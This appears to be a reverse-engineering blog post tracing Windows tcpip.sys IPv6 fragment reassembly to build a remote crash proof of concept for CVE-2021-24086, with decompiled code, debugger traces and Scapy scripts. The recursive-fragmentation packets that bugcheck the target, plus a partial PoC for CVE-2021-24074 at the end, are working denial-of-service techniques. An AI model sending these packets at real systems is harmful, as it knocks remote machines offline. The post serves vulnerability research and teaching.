Packet_t is an undocumented structure that is associated with received packets. A bunch of state is stored in this structure and figuring out the semantics of important fields is time consuming. IppReceiveHeadersHelper's main role is to kick off the parsing machine. It parses the IPv6 (or IPv4) header of the packet and reads the next_header field. As I mentioned above, this field is very important because it indicates how to read the next layer of the packet. This value is kept in the Packet structure, and a bunch of functions reads and updates it during parsing.

NetBufferList = Packet->NetBufferList;
FirstNetBuffer = NetBufferList->FirstNetBuffer;
CurrentMdl = FirstNetBuffer->CurrentMdl;
if ( (CurrentMdl->MdlFlags & 5) != 0 )
Va = CurrentMdl->MappedSystemVa;
else
Va = MmMapLockedPagesSpecifyCache(CurrentMdl, 0, MmCached, 0, 0, 0x40000000u);
IpHdr = (ipv6_header_t *)((char *)Va + FirstNetBuffer->CurrentMdlOffset);
if ( Protocol == (Protocol_t *)Ipv4Global )
{
// ...
}
else
{
}


The function does a lot more; it initializes several Packet_t fields but let's ignore that for now to avoid getting overwhelmed by complexity. Once the function returns back in IppReceiveHeaderBatch, it extracts a demuxer off the Protocol_t structure and invokes a parsing callback if the NextHeader is a valid extension header. The Protocol_t structure holds an array of Demuxer_t (term used in the driver).

struct Demuxer_t
{
void (__fastcall *Parse)(Packet_t *);
void *f0;
void *f1;
void *Size;
void *f3;
_BYTE gap[23];
};

struct Protocol_t
{
// ...
Demuxer_t Demuxers[277];
};


NextHeader (populated earlier in IppReceiveHeaderBatch) is the value used to index into this array.

If the demuxer is handling an extension header, then a callback is invoked to parse the header properly. This happens in a loop until the parsing hits the first part of the packet that isn't a header in which case it handles the next packet.

while ( ... )
{
NetBufferList = RcvList->NetBufferList;
if ( ... )
{
Demuxer = (Demuxer_t *)IpUdpEspDemux;
}
else
{
Demuxer = &Protocol->Demuxers[IpProto];
}
Demuxer = 0;
if ( Demuxer )
Demuxer->Parse(RcvList);
else
RcvList = RcvList->Next;
}


Makes sense - that's kinda how we would implement parsing of IPv6 packets as well right?

It is easy to dump the demuxers and their associated NextHeader / Parse values; these might come handy later.

- nh = 0  -> Ipv6pReceiveHopByHopOptions
- nh = 44 -> Ipv6pReceiveFragmentList
- nh = 60 -> Ipv6pReceiveDestinationOptions


Demuxer can expose a callback routine for parsing which I called Parse. The Parse method receives a Packet and it is free to update its state; for example to grab the NextHeader that is needed to know how to parse the next layer. This is what Ipv6pReceiveFragmentList looks like (Ipv6FragmentDemux.Parse):

It makes sure the next header is IPPROTO_FRAGMENT before going further. Again, makes sense.

#### The mechanics of IPv6 fragmentation

Now that we understand the overall flow a bit more, it is a good time to start thinking about fragmentation. We know we need to send fragmented packets to hit the code that was fixed by the update, which we know is important somehow. The function that parses fragments is Ipv6pReceiveFragment and it is hairy. Again, keeping track of fragments probably warrants that, so nothing unexpected here.

It's also the right time for us to read literature about how exactly IPv6 fragmentation works. Concepts have been useful until now, but at this point we need to understand the nitty-gritty details. I don't want to spend too much time on this as there is tons of content online discussing the subject so I'll just give you the fast version. To define a fragment, you need to add a fragmentation header which is called IPv6ExtHdrFragment in Scapy land:

class IPv6ExtHdrFragment(_IPv6ExtHdr):
fields_desc = [ByteEnumField("nh", 59, ipv6nh),
BitField("res1", 0, 8),
BitField("offset", 0, 13),
BitField("res2", 0, 2),
BitField("m", 0, 1),
IntField("id", None)]


The most important fields for us are :

• offset which tells the start offset of where the data that follows this header should be placed in the reassembled packet
• the m bit that specifies whether or not this is the latest fragment.

Note that the offset field is an amount of 8 bytes blocks; if you set it to 1, it means that your data will be at +8 bytes. If you set it to 2, they'll be at +16 bytes, etc.

Here is a small ghetto IPv6 fragmentation function I wrote to ensure I was understanding things properly. I enjoy learning through practice. (Scapy has fragment6):

def frag6(target, frag_id, bytes, nh, frag_size = 1008):
'''Ghetto fragmentation.'''
assert (frag_size % 8) == 0
leftover = bytes
offset = 0
frags = []
while len(leftover) > 0:
chunk = leftover[: frag_size]
leftover = leftover[len(chunk): ]
last_pkt = len(leftover) == 0
# 0 -> No more / 1 -> More
m = 0 if last_pkt else 1
assert offset < 8191
pkt = Ether() \
/ IPv6(dst = target) \
/ IPv6ExtHdrFragment(m = m, nh = nh, id = frag_id, offset = offset) \
/ chunk

offset += (len(chunk) // 8)
frags.append(pkt)
return frags


Easy enough. The other important aspect of fragmentation in the literature is related to IPv6 headers and what is called the unfragmentable part of a packet. Here is how Microsoft describes the unfragmentable part: "This part consists of the IPv6 header, the Hop-by-Hop Options header, the Destination Options header for intermediate destinations, and the Routing header". It also is the part that precedes the fragmentation header. Obviously, if there is an unfragmentable part, there is a fragmentable part. Easy, the fragmentable part is what you are sending behind the fragmentation header. The reassembly process is the process of stitching together the unfragmentable part with the reassembled fragmentable part into one beautiful reassembled packet. Here is a diagram taken from Understanding the IPv6 Header that sums it up pretty well:

All of this theoretical information is very useful because we can now look for those details while we reverse-engineer. It is always easier to read code and try to match it against what it is supposed or expected to do.

At this point, I felt I had accumulated enough new information and it was time for zooming back in into the target. We want to verify that reality works like the literature says it does and by doing we will improve our overall understanding. After studying this code for a while we start to understand the big lines. The function receives a Packet but as this structure is packet specific it is not enough to track the state required to reassemble a packet. This is why another important structure is used for that; I called it Reassembly.

The overall flow is basically broken up in three main parts; again no need for us to understand every single details, let's just understand it conceptually and what/how it tries to achieve its goals:

• 1 - Figure out if the received fragment is part of an already existing Reassembly. According to the literature, we know that network stacks should use the source address, the destination address as well as the fragmentation header's identifier to determine if the current packet is part of a group of fragments. In practice, the function IppReassemblyHashKey hashes those fields together and the resulting hash is used to index into a hash-table that stores Reassembly structures (Ipv6pFragmentLookup):
int IppReassemblyHashKey(__int64 Iface, int Identification, __int64 Pkt)
{
//...
Protocol = *(_QWORD *)(Iface + 40);
OffsetSrcIp = 12i64;
AddressLength = *(unsigned __int16 *)(*(_QWORD *)(Protocol + 16) + 6i64);
if ( Protocol != Ipv4Global )
H = RtlCompute37Hash(
g_37HashSeed,
Pkt + OffsetSrcIp,
OffsetDstIp = 16i64;
if ( Protocol != Ipv4Global )
H2 = RtlCompute37Hash(H, Pkt + OffsetDstIp, AddressLength);
return RtlCompute37Hash(H2, &Identification, 4i64) | 0x80000000;
}

Reassembly_t* Ipv6pFragmentLookup(__int64 Iface, int Identification, ipv6_header_t *Pkt, KIRQL *OldIrql)
{
// ...
v5 = *(_QWORD *)Iface;
Context.Signature = 0;
HashKey = IppReassemblyHashKey(v5, Identification, (__int64)Pkt);
*OldIrql = KeAcquireSpinLockRaiseToDpc(&Ipp6ReassemblyHashTableLock);
for ( CurrentReassembly = (Reassembly_t *)RtlLookupEntryHashTable(&Ipp6ReassemblyHashTable, HashKey, &Context);
;
CurrentReassembly = (Reassembly_t *)RtlGetNextEntryHashTable(&Ipp6ReassemblyHashTable, &Context) )
{
// If we have walked through all the entries in the hash-table,
// then we can just bail.
if ( !CurrentReassembly )
return 0;
// If the current entry matches our iface, pkt id, ip src/dst
// then we found a match!
if ( CurrentReassembly->Iface == Iface
&& CurrentReassembly->Identification == Identification
&& memcmp(&CurrentReassembly->Ipv6.src.u.Byte[0], &Pkt->src.u.Byte[0], 16) == 0
&& memcmp(&CurrentReassembly->Ipv6.dst.u.Byte[0], &Pkt->dst.u.Byte[0], 16) == 0 )
{
break;
}
}
// ...
return CurrentReassembly;
}

• 1.1 - If the fragment doesn't belong to any known group, it needs to be put in a newly created Reassembly. This is what IppCreateInReassemblySet does. It's worth noting that this is a point of interest for a reverse-engineer because this is where the Reassembly object gets allocated and constructed (in IppCreateReassembly). It means we can retrieve its size as well as some more information about some of the fields.
Reassembly_t *IppCreateInReassemblySet(
PKSPIN_LOCK SpinLock, void *Src, __int64 Iface, __int64 Identification, KIRQL NewIrql
)
{
Reassembly_t *Reassembly = IppCreateReassembly(Src, Iface, Identification);
if ( Reassembly )
{
IppInsertReassembly((__int64)SpinLock, Reassembly);
KeAcquireSpinLockAtDpcLevel(&Reassembly->Lock);
KeReleaseSpinLockFromDpcLevel(SpinLock);
}
else
{
KeReleaseSpinLock(SpinLock, NewIrql);
}
return Reassembly;
}


• 2 - Now that we have a Reassembly structure, the main function wants to figure out where the current fragment fits in the overall reassembled packet. The Reassembly keeps track of fragments using various lists. It uses a ContiguousList that chains fragments that will be contiguous in the reassembled packet. IppReassemblyFindLocation is the function that seems to implement the logic to figure out where the current fragment fits.

• 2.1 - If IppReassemblyFindLocation returns a pointer to the start of the ContiguousList, it means that the current packet is the first fragment. This is where the function extracts and keeps track of the unfragmentable part of the packet. It is kept in a pool buffer that is referenced in the Reassembly structure.

if ( ReassemblyLocation == &Reassembly->ContiguousStartList )
{
Reassembly->UnfragmentableLength = UnfragmentableLength;
if ( UnfragmentableLength )
{
UnfragmentableData = ExAllocatePoolWithTagPriority(
(POOL_TYPE)512,
UnfragmentableLength,
'erPI',
LowPoolPriority
);
Reassembly->UnfragmentableData = UnfragmentableData;
if ( !UnfragmentableData )
{
// ...
goto Bail_0;
}
// ...
// Copy the unfragmentable part of the packet inside the pool
// buffer that we have allocated.
RtlCopyMdlToBuffer(
FirstNetBuffer->MdlChain,
Reassembly->UnfragmentableData,
Reassembly->UnfragmentableLength,
v51);
}
*(_QWORD *)&Reassembly->Ipv6 = *(_QWORD *)Packet->Ipv6Hdr;
}

• 3 - The fragment is then added into the Reassembly as part of a group of fragments by IppReassemblyInsertFragment. On top of that, if we have received every fragment necessary to start a reassembly, the function Ipv6pReassembleDatagram is invoked. Remember this guy? This is the function that has been patched and that we hit earlier in the post. But this time, we understand how we got there.

At this stage we have an OK understanding of the data structures involved to keep track of groups of fragments and how/when reassembly gets kicked off. We've also commented and refined various structure fields that we lifted early in the process; this is very helpful because now we can understand the fix for the vulnerability:

void Ipv6pReassembleDatagram(Packet_t *Packet, Reassembly_t *Reassembly, char OldIrql)
{
//...
UnfragmentableLength = Reassembly->UnfragmentableLength;
TotalLength = UnfragmentableLength + Reassembly->DataLength;
// Below is the added code by the patch
if ( TotalLength > 0xFFF ) {
// Bail
}


How cool is that? That's really rewarding. Putting in a bunch of work that may feel not that useful at the time, but eventually adds up, snow-balls and really moves the needle forward. It's just a slow process and you gotta get used to it; that's just how the sausage is made.

Let's not get ahead of ourselves though, the emotional rollercoaster is right around the corner :)

## Hiding in plain sight

All right - at this point I think we are done with zooming out and understanding the big picture. We understand the beast well enough to start getting back on this BSoD. After reading Ipv6pReassembleDatagram a few times I honestly couldn't figure out where the advertised crash could happen. Pretty frustrating. That is why I decided instead to use the debugger to modify Reassembly->DataLength and UnfragmentableLength at runtime to see if this could give me any hints. The first one didn't seem to do anything, but the second one bug-checked the machine with a NULL dereference, bingo that is looking good!

After carefully analyzing the crash I've started to realize that the potential issue has been hiding in plain sight in front of my eyes; here is the code:

void Ipv6pReassembleDatagram(Packet_t *Packet, Reassembly_t *Reassembly, char OldIrql)
{
// ...
const uint32_t UnfragmentableLength = Reassembly->UnfragmentableLength;
const uint32_t TotalLength = UnfragmentableLength + Reassembly->DataLength;
// …
NetBufferList = (_NET_BUFFER_LIST *)NetioAllocateAndReferenceNetBufferAndNetBufferList(
IppReassemblyNetBufferListsComplete,
Reassembly,
0i64,
0i64,
0,
0);
if ( !NetBufferList )
{
// ...
goto Bail_0;
}

FirstNetBuffer = NetBufferList->FirstNetBuffer;
if ( NetioRetreatNetBuffer(FirstNetBuffer, uint16_t(HeaderAndOptionsLength), 0) < 0 )
{
// ...
goto Bail_1;
}

//...
*Buffer = Reassembly->Ipv6;


NetioAllocateAndReferenceNetBufferAndNetBufferList allocates a brand new NBL called NetBufferList. Then NetioRetreatNetBuffer is called:

NDIS_STATUS NetioRetreatNetBuffer(_NET_BUFFER *Nb, ULONG Amount, ULONG DataBackFill)
{
const uint32_t CurrentMdlOffset = Nb->CurrentMdlOffset;
if ( CurrentMdlOffset < Amount )
return NdisRetreatNetBufferDataStart(Nb, Amount, DataBackFill, NetioAllocateMdl);
Nb->DataOffset -= Amount;
Nb->DataLength += Amount;
Nb->CurrentMdlOffset = CurrentMdlOffset - Amount;
return 0;
}


Because the FirstNetBuffer just got allocated, it is empty and most of its fields are zero. This means that NetioRetreatNetBuffer triggers a call to NdisRetreatNetBufferDataStart which is publicly documented. According to the documentation, it should allocate an MDL using NetioAllocateMdl as the network buffer is empty as we mentioned above. One thing to notice is that the amount of bytes, HeaderAndOptionsLength, passed to NetioRetreatNetBuffer is truncated to a uint16_t; odd.

  if ( NetioRetreatNetBuffer(FirstNetBuffer, uint16_t(HeaderAndOptionsLength), 0) < 0 )


Now that there is backing space in the NB for the IPv6 header as well as the unfragmentable part of the packet, it needs to get a pointer to the backing data in order to populate the buffer. NdisGetDataBuffer is documented as to gain access to a contiguous block of data from a NET_BUFFER structure. After reading the documentation several time, it was a little bit confusing to me so I figured I'd throw NDIS in IDA and have a look at the implementation:

PVOID NdisGetDataBuffer(PNET_BUFFER NetBuffer, ULONG BytesNeeded, PVOID Storage, UINT AlignMultiple, UINT AlignOffset)
{
const _MDL *CurrentMdl = NetBuffer->CurrentMdl;
if ( !BytesNeeded || !CurrentMdl || NetBuffer->DataLength < BytesNeeded )
return 0i64;
// ...


Just looking at the beginning of the implementation something stands out. As NdisGetDataBuffer is called with HeaderAndOptionsLength (not truncated), we should be able to hit the following condition NetBuffer->DataLength < BytesNeeded when HeaderAndOptionsLength is larger than 0xffff. Why, you ask? Let's take an example. HeaderAndOptionsLength is 0x1337, so NetioRetreatNetBuffer allocates a backing buffer of 0x1337 bytes, and NdisGetDataBuffer returns a pointer to the newly allocated data; works as expected. Now let's imagine that HeaderAndOptionsLength is 0x31337. This means that NetioRetreatNetBuffer allocates 0x1337 (because of the truncation) bytes but calls NdisGetDataBuffer with 0x31337 which makes the call fail because the network buffer is not big enough and we hit this condition NetBuffer->DataLength < BytesNeeded.

As the returned pointer is trusted not to be NULL, Ipv6pReassembleDatagram carries on by using it for a memory write:

  *Buffer = Reassembly->Ipv6;


This is where it should bugcheck. As usual we can verify our understanding of the function with a WinDbg session. Here is a simple Python script that sends two fragments:

from scapy.all import *
first = Ether() \
/ IPv6(dst = 'ff02::1') \
/ IPv6ExtHdrFragment(id = id, m = 1, offset = 0) \
/ UDP(sport = 0x1122, dport = 0x3344) \
/ '---frag1'
second = Ether() \
/ IPv6(dst = 'ff02::1') \
/ IPv6ExtHdrFragment(id = id, m = 0, offset = 2) \
/ '---frag2'
sendp([first, second], iface='eth1')


Let's see what the reassembly looks like when those packets are received:

kd> bp tcpip!Ipv6pReassembleDatagram

kd> g
Breakpoint 0 hit
tcpip!Ipv6pReassembleDatagram:
fffff800117cdd6c 4488442418      mov     byte ptr [rsp+18h],r8b

kd> p
tcpip!Ipv6pReassembleDatagram+0x5:
fffff800117cdd71 48894c2408      mov     qword ptr [rsp+8],rcx

// ...

kd>
tcpip!Ipv6pReassembleDatagram+0x9c:
fffff800117cde08 48ff1569660700  call    qword ptr [tcpip!_imp_NetioAllocateAndReferenceNetBufferAndNetBufferList (fffff80011844478)]

kd>
tcpip!Ipv6pReassembleDatagram+0xa3:
fffff800117cde0f 0f1f440000      nop     dword ptr [rax+rax]

kd> r @rax
rax=ffffc107f7be1d90 <- this is the allocated NBL

kd> !ndiskd.nbl @rax
NBL                ffffc107f7be1d90    Next NBL           NULL
First NB           ffffc107f7be1f10    Source             NULL
Pool               ffffc107f58ba980 - NETIO
Flags              NBL_ALLOCATED

Walk the NBL chain                     Dump data payload
Show out-of-band information           Display as Wireshark hex dump

; The first NB is empty; its length is 0 as expected

kd> !ndiskd.nb ffffc107f7be1f10
NB                 ffffc107f7be1f10    Next NB            NULL
Length             0                   Source pool        ffffc107f58ba980
First MDL          0                   DataOffset         0
Current MDL        [NULL]              Current MDL offset 0

View associated NBL

// ...

kd> r @rcx, @rdx
rcx=ffffc107f7be1f10 rdx=0000000000000028 <- the first NB and the size to allocate for it

kd>
tcpip!Ipv6pReassembleDatagram+0xd9:
fffff800117cde45 e80a35ecff      call    tcpip!NetioRetreatNetBuffer (fffff80011691354)

kd> p
tcpip!Ipv6pReassembleDatagram+0xde:
fffff800117cde4a 85c0            test    eax,eax

; The first NB now has 0x28 bytes backing MDL

kd> !ndiskd.nb ffffc107f7be1f10
NB                 ffffc107f7be1f10    Next NB            NULL
Length             0n40                Source pool        ffffc107f58ba980
First MDL          ffffc107f5ee8040    DataOffset         0n56
Current MDL        [First MDL]         Current MDL offset 0n56

View associated NBL

// ...

kd>
tcpip!Ipv6pReassembleDatagram+0xfe:
fffff800117cde6a 48ff1507630700  call    qword ptr [tcpip!_imp_NdisGetDataBuffer (fffff80011844178)]

kd> p
tcpip!Ipv6pReassembleDatagram+0x105:
fffff800117cde71 0f1f440000      nop     dword ptr [rax+rax]

; This is the backing buffer; it has leftover data, but gets initialized later

kd> db @rax
ffffc107f5ee80b0  05 02 00 00 01 00 8f 00-41 dc 00 00 00 01 04 00  ........A.......


All right, so it sounds like we have a plan - let's get to work.

## Manufacturing a packet of the death: chasing phantoms

Well... sending a packet with a large header should be trivial right? That's initially what I thought. After trying various things to achieve this goal, I quickly realized it wouldn't be that easy. The main issue is the MTU. Basically, network devices don't allow you to send packets bigger than like ~1200 bytes. Online content suggests that some ethernet cards and network switches allow you to bump this limit. Because I was running my test in my own Hyper-V lab, I figured it was fair enough to try to reproduce the NULL dereference with non-default parameters, so I looked for a way to increase the MTU on the virtual switch to 64k.

The issue with that is that Hyper-V didn't allow me to do that. The only parameter I found allowed me to bump the limit to about 9k which is very far from the 64k I needed to trigger this issue. At this point, I felt frustrated because I felt I was so close to the end, but no cigar. Even though I had read that this vulnerability could be thrown over the internet, I kept going in this wrong direction. If it could be thrown from the internet, it meant it had to go through regular network equipment and there was no way a 64k packet would work. But I ignored this hard truth for a bit of time.

Eventually, I accepted the fact that I was probably heading the wrong direction, ugh. So I reevaluated my options. I figured that the bugcheck I triggered above was not the one that I would be able to trigger with packets thrown from the Internet. Maybe though there might be another code-path having a very similar pattern (retreat + NdisGetDataBuffer) that would result in a bugcheck. I've noticed that the TotalLength field is also truncated a bit further down in the function and written in the IPv6 header of the packet. This header is eventually copied in the final reassembled IPv6 header:

// The ROR2 is basically htons.
// One weird thing here is that TotalLength is truncated to 16b.
// We are able to make TotalLength >= 0x10000 by crafting a large
// packet via fragmentation.
// The issue with that is that, the size from the IPv6 header is smaller than
// the real total size. It's kinda hard to see how this would cause subsequent
// issue but hmm, yeah.
Reassembly->Ipv6.length = __ROR2__(TotalLength, 8);
// B00m, Buffer can be NULL here because of the issue discussed above.
// This copies the saved IPv6 header from the first fragment into the
// first part of the reassembled packet.
*Buffer = Reassembly->Ipv6;


My theory was that there might be some code that would read this Ipv6.length (which is truncated as __ROR2__ expects a uint16_t) and something bad might happen as a result. Although, the length would end up having a smaller value than the actual real size of the packet; it was hard for me to come up with a scenario where this would cause an issue but I still chased this theory as this was the only thing I had.

What I started to do at this point is to audit every demuxer that we saw earlier. I looked for ones that would use this length field somehow and looked for similar retreat / NdisGetDataBuffer patterns. Nothing. Thinking I might be missing something statically so I also heavily used WinDbg to verify my work. I used hardware breakpoints to track access to those two bytes but no hit. Ever. Frustrating.

After trying and trying I started to think that I might have been headed in the wrong direction again. Maybe, I really need to find a way to send such a large packet without violating the MTU. But how?

## Manufacturing a packet of the death: leap of faith

All right so I decided to start fresh again. Going back to the big picture, I've studied a bit more the reassembly algorithm, diffed again just in case I missed a clue somewhere, but nothing...

Could I maybe be able to fragment a packet that has a very large header and trick the stack into reassembling the reassembled packet? We've seen previously that we could use reassembly as a primitive to stitch fragments together; so instead of trying to send a very large fragment maybe we could break down a large one into smaller ones and have them stitched together in memory. It honestly felt like a long leap forward, but based on my reverse-engineering effort I didn't really see anything that would prevent that. The idea was blurry but felt like it was worth a shot. How would it really work though?

Sitting down for a minute, this is the theory that I came up with. I created a very large fragment that has many headers; enough to trigger the bug assuming I could trigger another reassembly. Then, I fragmented this fragment so that it can be sent to the target without violating the MTU.

reassembled_pkt = IPv6ExtHdrDestOpt(options = [
]) \
# ....
/ IPv6ExtHdrDestOpt(options = [
]) \
/ IPv6ExtHdrFragment(
id = second_pkt_id, m = 1,
nh = 17, offset = 0
) \
/ UDP(dport = 31337, sport = 31337, chksum=0x7e7f)

reassembled_pkt = bytes(reassembled_pkt)
frags = frag6(args.target, frag_id, reassembled_pkt, 60)


The reassembly happens and tcpip.sys builds this huge reassembled fragment in memory; that's great as I didn't think it would work. Here is what it looks like in WinDbg:

kd> bp tcpip+01ADF71 ".echo Reassembled NB; r @r14;"

kd> g
Reassembled NB
r14=ffff800fa2a46f10
tcpip!Ipv6pReassembleDatagram+0x205:
fffff8010a7cdf71 41394618        cmp     dword ptr [r14+18h],eax

kd> !ndiskd.nb @r14
NB                 ffff800fa2a46f10    Next NB            NULL
Length                10020            Source pool        ffff800fa06ba240
First MDL          ffff800fa0eb1180    DataOffset         0n56
Current MDL        [First MDL]         Current MDL offset 0n56

View associated NBL

kd> !ndiskd.nbl ffff800fa2a46d90
NBL                ffff800fa2a46d90    Next NBL           NULL
First NB           ffff800fa2a46f10    Source             NULL
Pool               ffff800fa06ba240 - NETIO
Flags              NBL_ALLOCATED

Walk the NBL chain                     Dump data payload
Show out-of-band information           Display as Wireshark hex dump

kd> !ndiskd.nbl ffff800fa2a46d90 -data
NET_BUFFER ffff800fa2a46f10
MDL ffff800fa0eb1180
ffff800fa0eb11f0  60 00 00 00 ff f8 3c 40-fe 80 00 00 00 00 00 00  ·····<@········
ffff800fa0eb1200  02 15 5d ff fe e4 30 0e-ff 02 00 00 00 00 00 00  ··]···0·········
ffff800fa0eb1210  00 00 00 00 00 00 00 01                          ········

...

MDL ffff800f9ff5e8b0
ffff800f9ff5e8f0  3c e1 01 ff 61 61 61 61-61 61 61 61 61 61 61 61  <···aaaaaaaaaaaa
ffff800f9ff5e900  61 61 61 61 61 61 61 61-61 61 61 61 61 61 61 61  aaaaaaaaaaaaaaaa
ffff800f9ff5e910  61 61 61 61 61 61 61 61-61 61 61 61 61 61 61 61  aaaaaaaaaaaaaaaa
ffff800f9ff5e920  61 61 61 61 61 61 61 61-61 61 61 61 61 61 61 61  aaaaaaaaaaaaaaaa
ffff800f9ff5e930  61 61 61 61 61 61 61 61-61 61 61 61 61 61 61 61  aaaaaaaaaaaaaaaa
ffff800f9ff5e940  61 61 61 61 61 61 61 61-61 61 61 61 61 61 61 61  aaaaaaaaaaaaaaaa
ffff800f9ff5e950  61 61 61 61 61 61 61 61-61 61 61 61 61 61 61 61  aaaaaaaaaaaaaaaa
ffff800f9ff5e960  61 61 61 61 61 61 61 61-61 61 61 61 61 61 61 61  aaaaaaaaaaaaaaaa

...

MDL ffff800fa0937280
ffff800fa09372c0  7a 69 7a 69 00 08 7e 7f                          zizi··~·


What we see above is the reassembled first fragment.

reassembled_pkt = IPv6ExtHdrDestOpt(options = [
]) \
# ...
/ IPv6ExtHdrDestOpt(options = [
]) \
/ IPv6ExtHdrFragment(
id = second_pkt_id, m = 1,
nh = 17, offset = 0
) \
/ UDP(dport = 31337, sport = 31337, chksum=0x7e7f)


It is a fragment that is 10020 bytes long, and you can see that the ndiskd extension walks the long MDL chain that describes the content of this fragment. The last MDL is the header of the UDP part of the fragment. What is left to do is to trigger another reassembly. What if we send another fragment that is part of the same group; would this trigger another reassembly?

Well, let's see if the below works I guess:

reassembled_pkt_2 = Ether() \
/ IPv6(dst = args.target) \
/ IPv6ExtHdrFragment(id = second_pkt_id, m = 0, offset = 1, nh = 17) \
/ 'doar-e ftw'

sendp(reassembled_pkt_2, iface = args.iface)


Here is what we see in WinDbg:

kd> bp tcpip!Ipv6pReassembleDatagram

; This is the first reassembly; the output packet is the first large fragment

kd> g
Breakpoint 0 hit
tcpip!Ipv6pReassembleDatagram:
fffff8054a5cdd6c 4488442418      mov     byte ptr [rsp+18h],r8b

; This is the second reassembly; it combines the first very large fragment, and the second fragment we just sent

kd> g
Breakpoint 0 hit
tcpip!Ipv6pReassembleDatagram:
fffff8054a5cdd6c 4488442418      mov     byte ptr [rsp+18h],r8b

...

; Let's see the bug happen live!

kd>
tcpip!Ipv6pReassembleDatagram+0xce:
fffff8054a5cde3a 0fb79424a8000000 movzx   edx,word ptr [rsp+0A8h]

kd>
tcpip!Ipv6pReassembleDatagram+0xd6:
fffff8054a5cde42 498bce          mov     rcx,r14

kd>
tcpip!Ipv6pReassembleDatagram+0xd9:
fffff8054a5cde45 e80a35ecff      call    tcpip!NetioRetreatNetBuffer (fffff8054a491354)

kd> r @edx
edx=10 <- truncated size

// ...

kd>
tcpip!Ipv6pReassembleDatagram+0xe6:
fffff8054a5cde52 8b9424a8000000  mov     edx,dword ptr [rsp+0A8h]

kd>
tcpip!Ipv6pReassembleDatagram+0xed:
fffff8054a5cde59 41b901000000    mov     r9d,1

kd>
tcpip!Ipv6pReassembleDatagram+0xf3:
fffff8054a5cde5f 8364242000      and     dword ptr [rsp+20h],0

kd>
tcpip!Ipv6pReassembleDatagram+0xf8:
fffff8054a5cde64 4533c0          xor     r8d,r8d

kd>
tcpip!Ipv6pReassembleDatagram+0xfb:
fffff8054a5cde67 498bce          mov     rcx,r14

kd>
tcpip!Ipv6pReassembleDatagram+0xfe:
fffff8054a5cde6a 48ff1507630700  call    qword ptr [tcpip!_imp_NdisGetDataBuffer (fffff8054a644178)]

kd> r @rdx
rdx=0000000000010010 <- non truncated size

kd> p
tcpip!Ipv6pReassembleDatagram+0x105:
fffff8054a5cde71 0f1f440000      nop     dword ptr [rax+rax]

kd> r @rax
rax=0000000000000000 <- NdisGetDataBuffer returned NULL!!!

kd> g
KDTARGET: Refreshing KD connection

*** Fatal System Error: 0x000000d1
(0x0000000000000000,0x0000000000000002,0x0000000000000001,0xFFFFF8054A5CDEBB)

Break instruction exception - code 80000003 (first chance)

A fatal system error has occurred.
Debugger entered on first try; Bugcheck callbacks have not been invoked.

A fatal system error has occurred.

nt!DbgBreakPointWithStatus:
fffff805473c46a0 cc              int     3

kd> kc
# Call Site
00 nt!DbgBreakPointWithStatus
01 nt!KiBugCheckDebugBreak
02 nt!KeBugCheck2
03 nt!KeBugCheckEx
04 nt!KiBugCheckDispatch
05 nt!KiPageFault
06 tcpip!Ipv6pReassembleDatagram
0e nt!KeExpandKernelStackAndCalloutInternal
0f nt!KeExpandKernelStackAndCalloutEx
11 NDIS!ndisMIndicateNetBufferListsToOpen
17 netvsc!NvscKmclProcessPacket
18 nt!KiInitializeKernel
19 nt!KiSystemStartup


Incredible! We managed to implement the recursive fragmentation idea we discussed. Wow, I really didn't think it would actually work. Morale of the day: don't leave any rocks unturned, follow your intuitions and reach the state of no unknowns.

# Conclusion

In this post I tried to take you with me through my journey to write a PoC for CVE-2021-24086, a true remote DoS vulnerability affecting Windows' tcpip.sys driver found by Microsoft own's @piazzt. From zero to remote BSoD. The PoC is available on my github here: 0vercl0k/CVE-2021-24086.

It was a wild ride mainly because it all looked way too easy and because I ended up chasing a bunch of ghosts.

I am sure that I've lost about 99% of my readers as it is a fairly long and hairy post, but if you made it all the way there you should join and come hang in the newly created Diary of a reverse-engineer Discord: https://discord.gg/4JBWKDNyYs. We're trying to build a community of people enjoying low level subjects. Hopefully we can also generate more interest for external contributions :)

Last but not least, special greets to the usual suspects: @yrp604 and @__x86 and @jonathansalwan for proof-reading this article.

# Bonus: CVE-2021-24074

Here is the Poc I built based on the high quality blogpost put out by Armis:

# Axel '0vercl0k' Souchet - April 4 2021
# Extremely detailed root-cause analysis was made by Armis:
# https://www.armis.com/resources/iot-security-blog/from-urgent-11-to-frag-44-microsoft-patches-critical-vulnerabilities-in-windows-tcp-ip-stack/
from scapy.all import *
import argparse
import codecs
import random

def trigger(args):
'''
kd> g
oob?
fffff804453c6f7a 4d8d2c1c        lea     r13,[r12+rbx]
kd> p
fffff804453c6f7e 498bd5          mov     rdx,r13
kd> db @r13
ffffb90e85b78220  c0 82 b7 85 0e b9 ff ff-38 00 04 10 00 00 00 00  ........8.......
kd> dqs @r13 l1
ffffb90e85b78220  ffffb90e85b782c0
kd> p
fffff804453c6f81 488d0d58830500  lea     rcx,[tcpip!Ipv4Global (fffff8044541f2e0)]
kd>
fffff804453c6f88 e8d7e1feff      call    tcpip!IppIsInvalidSourceAddressStrict (fffff804453b5164)
kd> db @rdx
kd> p
fffff804453c6f8d 84c0            test    al,al
kd> r.
al=0000000000000000  al=0000000000000000
kd> p
fffff804453c6f8f 0f85de040000    jne     tcpip!Ipv4pReceiveRoutingHeader+0x663 (fffff804453c7473)
kd>
fffff804453c6f95 498bcd          mov     rcx,r13
kd>
Breakpoint 3 hit
fffff804453c6f98 e8e7dff8ff      call    tcpip!Ipv4UnicastAddressScope (fffff80445354f84)
kd> dqs @rcx l1
ffffb90e85b78220  ffffb90e85b782c0

Call-stack (skip first hit):
kd> kc
# Call Site
02 tcpip!Ipv4pReassembleDatagram
0a nt!KeExpandKernelStackAndCalloutInternal
0b nt!KeExpandKernelStackAndCalloutEx

Snippet:
{
// ...
// kd> db @rax
